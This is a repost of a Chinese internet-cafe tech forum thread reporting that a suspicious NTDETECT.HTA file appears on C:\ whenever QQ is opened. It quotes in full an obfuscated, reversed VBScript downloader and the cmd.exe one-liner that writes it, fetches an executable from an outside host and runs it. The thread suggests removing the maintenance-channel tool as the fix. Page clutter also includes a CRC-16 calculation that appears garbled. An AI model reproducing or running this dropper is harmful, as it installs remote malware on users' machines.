xadsafe做暗刷_深蓝维护通道有暗刷? - 综合技术讨论大区 - 死性不改BBS - 网维行业自由、中立的技术与信息交流平台 - Powered by Discuz!...

最新推荐文章于 2021-08-04 18:46:13 发布
最新推荐文章于 2021-08-04 18:46:13 发布
阅读量481 收藏
点赞数
文章标签: xadsafe做暗刷
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39531594/article/details/112811466
版权
该帖揭示了一个现象:打开QQ时,C盘根目录会自动生成NTDETECT.HTA文件,内容疑似暗刷脚本。文件通过cmd执行命令连接到特定网址。解决办法是移除深蓝维护通道或解绑三层服务。
摘要由CSDN通过智能技术生成

本帖最后由 小米 于 2018-4-27 04:52 编辑

今天发现的,只要一打开QQ,C盘根目录生成NTDETECT.HTA文件,内容是

>tpircs/<

esolc.wodniw

)Li(nuR.llehS

005 peels.tpircsw

2,Li eliFoTevaS.teGa

)ydoBesnopser.tsoP(etirW.teGa

)(nepO.teGa

1=epyT.teGa

3=edoM.teGa

))"","(","(ma(er(tS.BD(OD(A"(ecalper(tcejbOetaerC=teGa teS

)(dneS.tsoP

0,Ri,"TEG" nepO.tsoP

))"","*","l*l*eh*S.*tp*irc*s*W*"(ecalper(tcejbOetaerC=llehS teS

))"","~","~PT~T~HL~MX.2~l~mx~s~M"(ecalper(tcejbOetaerC = tsoP teS

)"exe.44tiniresu\:c"(esaCL=Li

)))yarrAeniLdmc(dnuoBU(yarrAeniLdmc(esaCL=Ri

)eniLdnammoc.ATHelpmaSyM(tilpS=yarrAeniLdmc

0,0 oTeziser.wodniw

0004,0004 oTevom.wodniw

txeN emuser rorre no

>sbv=egaugnal tpircs<

然后会执行

"C:\Windows\System32\cmd.exe"  /q /c echo ^>C:\\NTDETECT.HTA&&echo ^^>tpircs/^<>>C:\\NTDETECT.HTA&&echo esolc.wodniw>>C:\\NTDETECT.HTA&&echo )Li(nuR.llehS>>C:\\NTDETECT.HTA&&echo 005 peels.tpircsw>>C:\\NTDETECT.HTA&&echo 2,Li eliFoTevaS.teGa>>C:\\NTDETECT.HTA&&echo )ydoBesnopser.tsoP(etirW.teGa>>C:\\NTDETECT.HTA&&echo )(nepO.teGa>>C:\\NTDETECT.HTA&&echo 1=epyT.teGa>>C:\\NTDETECT.HTA&&echo 3=edoM.teGa>>C:\\NTDETECT.HTA&&echo ))"","(","(ma(er(tS.BD(OD(A"(ecalper(tcejbOetaerC=teGa teS>>C:\\NTDETECT.HTA&&echo )(dneS.tsoP>>C:\\NTDETECT.HTA&&echo 0,Ri,"TEG" nepO.tsoP>>C:\\NTDETECT.HTA&&echo ))"","*","l*l*eh*S.*tp*irc*s*W*"(ecalper(tcejbOetaerC=llehS teS>>C:\\NTDETECT.HTA&&echo ))"","~","~PT~T~HL~MX.2~l~mx~s~M"(ecalper(tcejbOetaerC = tsoP teS>>C:\\NTDETECT.HTA&&echo )"exe.%time:~6,2%tiniresu\:c"(esaCL=Li>>C:\\NTDETECT.HTA

ing 127.0.0.1 -n 3 >nul&&echo )))yarrAeniLdmc(dnuoBU(yarrAeniLdmc(esaCL=Ri>>C:\\NTDETECT.HTA&&echo )eniLdnammoc.ATHelpmaSyM(tilpS=yarrAeniLdmc>>C:\\NTDETECT.HTA&&echo 0,0 oTeziser.wodniw>>C:\\NTDETECT.HTA&&echo 0004,0004 oTevom.wodniw>>C:\\NTDETECT.HTA&&echo txeN emuser rorre no>>C:\\NTDETECT.HTA&&echo ^>sbv=egaugnal tpircs^^>>C:\\NTDETECT.HTA&&C:\\NTDETECT.HTA http://www.399x8.cn:888/xz.s。w。f

去掉深蓝维护通道或者在维护通道服务端点一下三层解绑就没事了,不懂被什么注入了

weixin_39531594
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深蓝维护通道]VIP专版.7z
07-16
维护通道/桌面墙纸/窗口进程查杀/网吧与安全/远程控制/日志查看/远程桌面/远程摄像头/远程进程/远程窗口/等。 她摆脱了传统维护通道必需开共享带来的种种安全隐患及不足.纯tcp实现.深蓝(Thinking)历时两年倾心打造.程序品质:一如既往的绿色优雅温柔,纯洁婉约简洁,无任何乱七八糟的插件.主要功能:维护通道/桌面墙纸/窗口进程查杀/网吧与安全/远程控制/日志查看/远程桌面/远程摄像头/远程进程/远程窗口/等...深蓝TCP维护通道v7.3更新内容:[修正]优化升级程序,解决服务未停止不能一键升级的BUG[修正]开机批处理为空,开机AU3不执行的BUG.[修正]客户端精简为一个exe和一个ini文件(ini亦可不要,直接参数调用EXE)[修正]利用pubwin传播病毒检测在pubwin某些版本下误报的问题.[新增]超级用户不执行任何操作,对OBM无盘的支持.[新增]超级用户不执行任何操作,对方格子无盘的支持.[新增]桌面新增,本机收费标准显示功能.[修正]开机批处理au3中加了延时导致失败的问题.[修正]VIP功能,桌面墙纸锁定失效的问题,桌面墙纸锁定功能增强.修正闪烁一下的问题.
DBNT升级程序深蓝TCP维护通道v7.3绿色中文免费版网吧维护工具
08-06
深蓝TCP维护通道 是一款在已经好系统后,即时对网吧客户机(或企业局域网客户机)系统统一进行改变、更新、升级、维护、控制的网吧维护工具。使网吧维护(企业维护)更智能、专业。   她摆脱了传统维护通道必需开共享带来的种种安全隐患及不足。纯tcp实现。深蓝(Thinking)历时两年倾心打造。   程序品质:一如既往的绿色优雅温柔,纯洁婉约简洁,无任何乱七八糟的插件。   主要功能:维护通道/ 桌面
服务器支持磁盘阵列,服务器磁盘阵列搭建 - 综合技术讨论大区 - 死性不改BBS - 网维行业自由中立技术信息交流平台 - Powered by Discuz!...
weixin_32821643的博客
07-29 388
别装深沉了,赶快来凑凑热闹吧!您需要 登录 才可以下载或查看,没有帐号?立即注册x本帖最后由 lin415361463 于 2020-11-16 13:44 编辑首先说说什么是磁盘阵列:磁盘阵列简单的说就是将若干个很多便宜、容量较小、稳定性较高、速度较慢磁盘,组合成一个大型的磁盘组。磁盘阵列的工作模式:RAID可分为级别0到级别6,通常称为:RAID0,RAID1,RAID2,RAID3,RAID...
服务器文件剪切后蓝屏,帮忙分析一下蓝屏文件已上传 - 综合技术讨论大区 - 死性不改BBS - 网维行业自由中立技术信息交流平台 - Powered by Discuz!...
weixin_28829629的博客
08-04 873
Loading Dump File [C:\Users\Administrator\AppData\Local\Temp\HZ$D.585.4128\192.168.1.84_2016.5.16.23.27.20.dmp]Mini Kernel Dump File: Only registers and stack trace are availableSymbol search path is:...
xadsafe暗刷_手把手教你如何去掉网吧广告之PUBWin2015_XADSAFE
weixin_39776298的博客
12-31 227
链接: https://pan.baidu.com/s/1sOMjmseN_O9NW1fne6nyUw 密码: s7hf完完全全学会网吧去广告第四节:Pubwin2015篇前言:暗安全兴趣小组追求的是在技术突破中的快感,他们在乎过程,而不是最终的结果。暗安全欢迎任何有共同爱好的人加入我们的团体,在小组内共享,追求,相互交流!*************************************...
死性不改的 WIN 2008开启远程桌面批处理很方便
04-13
在IT行业中,Windows Server 2008操作系统是企业级服务器环境的常见选择。然而,对于一些用户来说,系统默认的配置可能并不完全符合他们的需求,例如远程桌面服务可能未开启。"死性不改的WIN 2008开启远程桌面批处理...
教育科研-学习工具-SV40LT重组构建染色体缺失猫叫综合征细胞模型及其细胞库.zip
08-14
在生物学研究中,SV40LT常被用作转化因子,能够使细胞获得不死性,便于建立稳定细胞系,这对研究细胞周期调控、肿瘤发生机制以及药物筛选等方面具有重要意义。 在本研究中,科研人员利用SV40LT重组技术构建了染色体...
开车不犯困100首MP3,之11-20,DJ.rar
最新发布
06-08
6. "1915.MC南辞_安筱冷-死性不改.mp3":MC南辞与安筱冷的联袂之作,"死性不改"可能是对坚持自我、保持热情的表达,鼓励驾驶者保持原动力。 7. "1914.泽亦龙-故事人的夜晚.mp3":泽亦龙的单曲,"故事人的夜晚"可能...
死性不改电源模式更改工具
09-17
死性不改电源模式更改工具,主要用于修复电脑已关机,但CPU风扇不停转,主机照样加点的故障
2021法医学-简单单选_3(精选试题).doc
11-28
4. 主动脉瓣关闭不全可能是由多种原因引起的,如主动脉粥样硬化、类风湿性主动脉炎、亚急性细菌性心内膜炎、风湿性心脏病等,但第三期梅毒通常不引起主动脉瓣关闭不全。 5. AS(动脉粥样硬化)的纤维斑块中可能出现...
深蓝VIP验证脱壳去效应完美版
10-07
深蓝VIP验证脱壳去效应完美版
xadsafe暗刷_手把手教你如何去掉网吧广告之万象OL篇_XADSAFE
weixin_39949776的博客
12-22 1354
链接: https://pan.baidu.com/s/1JKfgKARIORLj4kKDl8VOZg 密码: 63k4完完全全学会网吧去广告之万象OL篇完完全全学会网吧去广告第二节:万象OL篇前言:此事原由不再多说,今天说的是万象OL&PubwinOL,及顺网旗下所有计费产品!暗安全兴趣小组追求的是在技术突破中的快感,他们在乎过程,而不是最终的结果。暗安全欢迎任何有共同爱好的人加入我们的...
xadsafe暗刷_手把手教你如何去掉网吧广告之网维大师_XADSAFE
weixin_39530557的博客
12-22 815
链接: https://pan.baidu.com/s/1JH4920S_nWdcV66G-AAp3Q 密码: 5e64完完全全学会网吧去广告一:网维大师篇自8月22日起,网维大师几乎可以说引起了界内网吧技术人员的公愤。原因不再赘述。再次,本人决定公布顺网系列所有产品的去广告方法。以表示自己的不服!暗安全兴趣小组追求的是在技术突破中的快感,他们在乎过程,而不是最终的结果。暗安全欢迎任何有共同爱好的...
xadsafe暗刷_我叫MT3.61四暗影刷法攻略方法
weixin_39890332的博客
12-22 256
看到四暗影的组合特效被吓尿了吧,活动期间每天都有免费的机会其他两次,大家不要浪费了我在这里提前给大家一个自杀式刷法的分析,不足之处大家一起交流 。沉鱼:属性跟地中海暗夜男一样的,这里可以参照精英暗夜男地中海的刷法,但是貌似不可能规避掉羞花。卡牌准备:30级以上蓝方砖。阵容: 空 奶 空空 方砖 空攻击力要自己慢慢调整,这个时间段我也无法上线测试。原理是利用闭月的法抗天赋跟落燕随机目标的出血,闭月...
xadsafe暗刷_我叫MT四暗影刷法心得
weixin_31099497的博客
12-31 393
我叫mt开出了一个四暗影的活动副本,四暗影齐齐登场,在本次活动大家可以获得沉鱼,落雁,闭月,羞花四张卡牌,但是因为种种限制,只能用自杀刷法,但是可以让小编吐槽一下吗?下面是两种卡牌的攻略,还有两种的小编还在找方法,大家稍安勿躁啊!深坑平民险跳的节奏啊!四暗影羞花自杀如图我想吐槽下大师…我男贼穿小软内裤法防518+居然给你的小怪花花干掉了!难道你花花是物理攻击?羞花蓝色MAX竟然不可进化。四暗影贼暂...
xadsafe暗刷_手把手教你如何去掉网吧广告之营销大师_XADSAFE
weixin_39776991的博客
12-22 364
链接: https://pan.baidu.com/s/1y9TgQdrfhdRbNl5tvlknAw 密码: db4q完完全全学会网吧去广告第二节:营销大师篇前言:暗安全兴趣小组追求的是在技术突破中的快感,他们在乎过程,而不是最终的结果。暗安全欢迎任何有共同爱好的人加入我们的团体,在小组内共享,追求,相互交流!*******************************************...
入侵无盘系统服务器,多起专门针对网吧服务器入侵然后植入各种包括吃鸡盗号等病毒的事件,大家多注意下!...
weixin_39983350的博客
07-31 963
首先要说的是本帖来自wglm的thinking,我是帖子搬运工,有必要转过来是因为这个事件对各位网吧的哥们很重要,是一起恶性的网吧安全事件,直接威胁到网吧各种游戏账号的安全问题!!!安全无小事,大家都看看吧,有问题跟帖说说你的想法,下面是完整的复制过来的内容:今天一起床就遇到两位朋友在群里讨论自己的网吧被入侵。发出特征后,另一朋友检查自己系统发现也被入侵,如果近期网吧出现以下问题的朋友最好检查下...
java生成指定时间内的随机时间
热门推荐
leo
02-13 1万+
public static void main(String[] args) { for (int i=0;i&lt;30;i++){ Date date = randomDate("2019-01-01","2019-01-31"); System.out.println(new SimpleDateFormat("yyyy....
adsafe 罪恶的根源 破软件一个
05-02 2717
起因今天找了一天的广告,因为这两天突然开始跳出弹出广告了,超级劣质的那种。然后我也不知道咋办,就腾讯管家杀了个毒,果然没有任何用处;然后几天都没有问题,然后今天又开始弹窗了;真的是超级劣质,你说你个广告都不好好,什么破程序员了; 然后就必须找出罪魁祸首了;其实最早我就觉得奇怪,因为很多地方都会有一个风骚的女人,还有一个和尚的广告,我也没理会;因为adsafe这个软件屏蔽了很多,这个屏蔽不掉也没
请以CRC-16查表检验法计算0x1234的校验结果
05-05
首先需要准备一个CRC-16的查表,这里给出一个标准的CRC-16查表: | 十六进制 | 二进制 | | -------- | ------ | | 0x0000 | 0000000000000000 | | 0x1021 | 0001000000100001 | | 0x2042 | 0010000001000010 | | 0x3063 | 0011000001100011 | | 0x4084 | 0100000001000100 | | 0x50a5 | 0101000010100101 | | 0x60c6 | 0110000011000110 | | 0x70e7 | 0111000011100111 | | 0x8108 | 1000000100001000 | | 0x9129 | 1001000100101001 | | 0xa14a | 1010000101001010 | | 0xb16b | 1011000101101011 | | 0xc18c | 1100000110001100 | | 0xd1ad | 1101000110101101 | | 0xe1ce | 1110000111001110 | | 0xf1ef | 1111000111101111 | 接下来,我们以0x1234为例,进行CRC-16查表检验法的计算: 1. 将0x1234左移16位,得到0x12340000。 2. 用0x1021去除0x12340000,得到商0x1234和余数0x0000。 3. 将余数0x0000与之前的0x1234合并,得到0x12340000。 4. 将0x1021去除0x12340000,得到商0x1234和余数0x0000。 5. 将余数0x0000与之前的0x1234合并,得到0x12340000。 6. 重复步骤4和5,直到计算完所有的16位。 7. 最终得到的余数就是CRC-16的校验结果,即0x4d22。 因此,0x1234的CRC-16校验结果为0x4d22。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值